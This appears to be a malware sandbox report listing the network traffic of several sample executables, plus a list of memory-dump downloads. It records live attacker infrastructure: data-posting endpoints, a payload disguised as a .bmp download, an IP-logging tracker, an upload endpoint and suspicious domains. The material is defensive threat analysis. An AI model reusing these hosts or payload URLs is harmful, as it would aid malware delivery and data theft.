    • 212.192.241.15:80
      http://212.192.241.15/base/api/getData.php
      http
      File.exe
      3.1kB
       1.8kB
       11
      9

      HTTP Request

      POST http://212.192.241.15/base/api/getData.php

      HTTP Response

      200

      HTTP Request

      POST http://212.192.241.15/base/api/getData.php

      HTTP Response

      200
    • 104.21.51.48:443
      https://niemannbest.me/?username=seo5
      tls, http
      FoxSBrowser.exe
      1.2kB
       7.3kB
       12
      17

      HTTP Request

      GET https://niemannbest.me/?username=seo1

      HTTP Response

      522

      HTTP Request

      GET https://niemannbest.me/?username=seo2

      HTTP Response

      522

      HTTP Request

      GET https://niemannbest.me/?username=seo3

      HTTP Response

      522

      HTTP Request

      GET https://niemannbest.me/?username=seo4

      HTTP Response

      522

      HTTP Request

      GET https://niemannbest.me/?username=seo5
    • 45.133.1.107:80
      http://45.133.1.107/download/NiceProcessX64.bmp
      http
      File.exe
      6.4kB
       335.8kB
       129
      229

      HTTP Request

      HEAD http://45.133.1.107/download/NiceProcessX64.bmp

      HTTP Response

      200

      HTTP Request

      GET http://45.133.1.107/download/NiceProcessX64.bmp

      HTTP Response

      200
    • 80.92.205.116:59599
      Process.exe
      152 B
       120 B
       3
      3
    • 212.192.241.15:80
      http://212.192.241.15/base/api/getData.php
      http
      File.exe
      779 B
       6.1kB
       8
      8

      HTTP Request

      POST http://212.192.241.15/base/api/getData.php

      HTTP Response

      200
    • 80.92.205.116:59599
      Process.exe
      152 B
       120 B
       3
      3
    • 80.92.205.116:59599
      Process.exe
      152 B
       120 B
       3
      3
    • 208.95.112.1:80
      http://ip-api.com/json/?fields=8198
      http
      SystemNetworkService
      1.3kB
       909 B
       9
      5

      HTTP Request

      GET http://ip-api.com/json/?fields=8198

      HTTP Response

      200

      HTTP Request

      GET http://ip-api.com/json/?fields=8198

      HTTP Response

      200

      HTTP Request

      GET http://ip-api.com/json/?fields=8198

      HTTP Response

      200
    • 172.67.213.194:443
      https://bh.mygameadmin.com/report7.4.php
      tls, http
      SystemNetworkService
      1.4kB
       5.6kB
       10
      12

      HTTP Request

      POST https://bh.mygameadmin.com/report7.4.php

      HTTP Response

      200
    • 88.99.66.31:443
      iplogger.org
      tls
      IEXPLORE.EXE
      677 B
       5.5kB
       8
      10
    • 88.99.66.31:443
      https://iplogger.org/favicon.ico
      tls, http
      IEXPLORE.EXE
      1.7kB
       24.8kB
       17
      24

      HTTP Request

      GET https://iplogger.org/1h49r7

      HTTP Response

      200

      HTTP Request

      GET https://iplogger.org/favicon.ico

      HTTP Response

      200
    • 80.92.205.116:59599
      Process.exe
      152 B
       120 B
       3
      3
    • 172.67.213.194:443
      https://bh.mygameadmin.com/report7.4.php
      tls, http
      SystemNetworkService
      1.1kB
       1.3kB
       6
      7

      HTTP Request

      POST https://bh.mygameadmin.com/report7.4.php

      HTTP Response

      200
    • 172.67.213.194:443
      https://bh.mygameadmin.com/report7.4.php
      tls, http
      SystemNetworkService
      1.1kB
       1.4kB
       6
      7

      HTTP Request

      POST https://bh.mygameadmin.com/report7.4.php

      HTTP Response

      200
    • 80.92.205.116:59599
      Process.exe
      152 B
       120 B
       3
      3
    • 80.92.205.116:59599
      Process.exe
      152 B
       120 B
       3
      3
    • 80.92.205.116:59599
      Process.exe
      152 B
       120 B
       3
      3
    • 204.79.197.200:443
      ieonline.microsoft.com
      tls
      iexplore.exe
      661 B
       7.6kB
       7
      10
    • 80.92.205.116:59599
      Process.exe
      152 B
       120 B
       3
      3
    • 80.92.205.116:59599
      Process.exe
      152 B
       120 B
       3
      3
    • 80.92.205.116:59599
      Process.exe
      152 B
       120 B
       3
      3
    • 80.92.205.116:59599
      Process.exe
      152 B
       120 B
       3
      3
    • 187.212.183.165:80
      gmpeople.com
      152 B
       3
    • 80.92.205.116:59599
      Process.exe
      152 B
       120 B
       3
      3
    • 45.9.20.13:80
      Details.exe
      152 B
       3
    • 80.92.205.116:59599
      Process.exe
      152 B
       120 B
       3
      3
    • 118.33.109.122:80
      http://gmpeople.com/upload/
      http
      636 B
       132 B
       4
      3

      HTTP Request

      POST http://gmpeople.com/upload/
    • 80.92.205.116:59599
      Process.exe
      52 B
       40 B
       1
      1
    • 8.8.8.8:53
      iplogger.org
      dns
      IEXPLORE.EXE
      58 B
       74 B
       1
      1

      DNS Request

      iplogger.org

      DNS Response

      88.99.66.31

    • 8.8.8.8:53
      ip-api.com
      dns
      SystemNetworkService
      56 B
       72 B
       1
      1

      DNS Request

      ip-api.com

      DNS Response

      208.95.112.1

    • 8.8.8.8:53
      toa.mygametoa.com
      dns
      SystemNetworkService
      63 B
       79 B
       1
      1

      DNS Request

      toa.mygametoa.com

      DNS Response

      34.64.183.91

    • 8.8.8.8:53
      toa.mygametoa.com
      dns
      SystemNetworkService
      63 B
       124 B
       1
      1

      DNS Request

      toa.mygametoa.com

    • 34.64.183.91:53
      toa.mygametoa.com
      SystemNetworkService
      61.7kB
       662.6kB
       1175
      1190
    • 8.8.8.8:53
      cdn.discordapp.com
      dns
      Graphicss.exe
      64 B
       144 B
       1
      1

      DNS Request

      cdn.discordapp.com

      DNS Response

      162.159.135.233
      162.159.134.233
      162.159.130.233
      162.159.133.233
      162.159.129.233

    • 8.8.8.8:53
      staticimg.youtuuee.com
      dns
      Files.exe
      68 B
       84 B
       1
      1

      DNS Request

      staticimg.youtuuee.com

      DNS Response

      45.136.151.102

    • 8.8.8.8:53
      ipinfo.io
      dns
      File.exe
      55 B
       71 B
       1
      1

      DNS Request

      ipinfo.io

      DNS Response

      34.117.59.81

    • 8.8.8.8:53
      topniemannpickshop.cc
      dns
      FoxSBrowser.exe
      67 B
       134 B
       1
      1

      DNS Request

      topniemannpickshop.cc

    • 8.8.8.8:53
      niemannbest.me
      dns
      FoxSBrowser.exe
      60 B
       92 B
       1
      1

      DNS Request

      niemannbest.me

      DNS Response

      104.21.51.48
      172.67.221.103

    • 8.8.8.8:53
      bh.mygameadmin.com
      dns
      SystemNetworkService
      64 B
       96 B
       1
      1

      DNS Request

      bh.mygameadmin.com

      DNS Response

      172.67.213.194
      104.21.75.46

    • 8.8.8.8:53
      www.microsoft.com
      dns
      SystemNetworkService
      63 B
       230 B
       1
      1

      DNS Request

      www.microsoft.com

      DNS Response

      104.85.1.163

    • 8.8.8.8:53
      all-mobile-pa1ments.com.mx
      dns
      FoxSBrowser.exe
      72 B
       131 B
       1
      1

      DNS Request

      all-mobile-pa1ments.com.mx

    • 8.8.8.8:53
      buy-fantasy-football.com.sg
      dns
      FoxSBrowser.exe
      73 B
       122 B
       1
      1

      DNS Request

      buy-fantasy-football.com.sg

    • 8.8.8.8:53
      ggg-cl.biz
      dns
      Details.exe
      112 B
       112 B
       2
      2

      DNS Request

      ggg-cl.biz

      DNS Request

      ggg-cl.biz

    • 8.8.8.8:53
      gmpeople.com
      dns
      58 B
       218 B
       1
      1

      DNS Request

      gmpeople.com

      DNS Response

      187.212.183.165
      118.33.109.122
      210.207.244.101
      177.206.228.123
      89.133.230.171
      189.165.94.67
      186.6.254.27
      190.117.75.91
      181.129.180.251
      190.218.32.60

    • 8.8.8.8:53
      ggg-cl.biz
      dns
      Details.exe
      112 B
       112 B
       2
      2

      DNS Request

      ggg-cl.biz

      DNS Request

      ggg-cl.biz

    • 8.8.8.8:53
      mile48.com
      dns
      56 B
       127 B
       1
      1

      DNS Request

      mile48.com

    • 8.8.8.8:53
      lecanardstsornin.com
      dns
      66 B
       1

      DNS Request

      lecanardstsornin.com

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/880-167-0x0000000001300000-0x0000000001372000-memory.dmp

      Filesize

      456KB

      Download

    • memory/880-166-0x00000000007B0000-0x00000000007FD000-memory.dmp

      Filesize

      308KB

      Download

    • memory/968-163-0x0000000001D60000-0x0000000001E61000-memory.dmp

      Filesize

      1.0MB

      Download

    • memory/968-165-0x0000000001E70000-0x0000000001ECD000-memory.dmp

      Filesize

      372KB

      Download

    • memory/1040-177-0x0000000003BC0000-0x0000000003D0C000-memory.dmp

      Filesize

      1.3MB

      Download

    • memory/1220-164-0x0000000003A40000-0x0000000003A55000-memory.dmp

      Filesize

      84KB

      Download

    • memory/1404-138-0x00000000023F0000-0x000000000240D000-memory.dmp

      Filesize

      116KB

      Download

    • memory/1404-155-0x0000000004DB4000-0x0000000004DB6000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1404-92-0x00000000009D9000-0x00000000009FC000-memory.dmp

      Filesize

      140KB

      Download

    • memory/1404-132-0x0000000000220000-0x0000000000250000-memory.dmp

      Filesize

      192KB

      Download

    • memory/1404-139-0x0000000004DB1000-0x0000000004DB2000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1404-144-0x0000000004DB3000-0x0000000004DB4000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1404-134-0x0000000000400000-0x000000000088B000-memory.dmp

      Filesize

      4.5MB

      Download

    • memory/1404-97-0x0000000000BC0000-0x0000000000BDF000-memory.dmp

      Filesize

      124KB

      Download

    • memory/1404-143-0x0000000004DB2000-0x0000000004DB3000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1492-170-0x0000000003170000-0x0000000003180000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1492-95-0x0000000000020000-0x0000000000023000-memory.dmp

      Filesize

      12KB

      Download

    • memory/1516-55-0x0000000074E51000-0x0000000074E53000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1656-146-0x0000000000230000-0x0000000000239000-memory.dmp

      Filesize

      36KB

      Download

    • memory/1656-123-0x000000000177C000-0x000000000178C000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1656-147-0x0000000000400000-0x00000000016C8000-memory.dmp

      Filesize

      18.8MB

      Download

    • memory/1700-77-0x00000000009A0000-0x00000000009A1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1700-140-0x0000000004AB0000-0x0000000004AB1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1760-181-0x000007FEFB931000-0x000007FEFB933000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1768-142-0x000000000030C000-0x0000000000328000-memory.dmp

      Filesize

      112KB

      Download

    • memory/1768-150-0x00000000001B0000-0x00000000001E0000-memory.dmp

      Filesize

      192KB

      Download

    • memory/1768-151-0x0000000000400000-0x00000000016D9000-memory.dmp

      Filesize

      18.8MB

      Download

    • memory/1836-182-0x0000000001C90000-0x0000000001C91000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1836-183-0x0000000001C91000-0x0000000001C92000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1836-185-0x0000000001C92000-0x0000000001C94000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1884-79-0x0000000000D80000-0x0000000000D81000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1884-169-0x000000001AE10000-0x000000001AE12000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1884-148-0x0000000000250000-0x0000000000251000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1976-161-0x00000000000E0000-0x000000000012D000-memory.dmp

      Filesize

      308KB

      Download

    • memory/1976-203-0x00000000004E0000-0x00000000004FB000-memory.dmp

      Filesize

      108KB

      Download

    • memory/1976-168-0x0000000000450000-0x00000000004C2000-memory.dmp

      Filesize

      456KB

      Download

    • memory/1976-204-0x0000000003160000-0x0000000003265000-memory.dmp

      Filesize

      1.0MB

      Download

    • memory/2312-188-0x00000000024E0000-0x000000000312A000-memory.dmp

      Filesize

      12.3MB

      Download

    • memory/2312-192-0x00000000024E0000-0x000000000312A000-memory.dmp

      Filesize

      12.3MB

      Download

    • memory/2312-190-0x00000000024E0000-0x000000000312A000-memory.dmp

      Filesize

      12.3MB

      Download

    • memory/2572-195-0x00000000023C0000-0x00000000023C1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2572-199-0x00000000023C1000-0x00000000023C2000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2572-200-0x00000000023C2000-0x00000000023C4000-memory.dmp

      Filesize

      8KB

      Download

    • memory/2728-198-0x0000000002490000-0x00000000030DA000-memory.dmp

      Filesize

      12.3MB

      Download

    • memory/2728-201-0x0000000002490000-0x00000000030DA000-memory.dmp

      Filesize

      12.3MB

      Download

    • memory/2728-202-0x0000000002490000-0x00000000030DA000-memory.dmp

      Filesize

      12.3MB

      Download

    • memory/2924-205-0x00000000005F0000-0x00000000005F1000-memory.dmp

      Filesize

      4KB

      Download

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.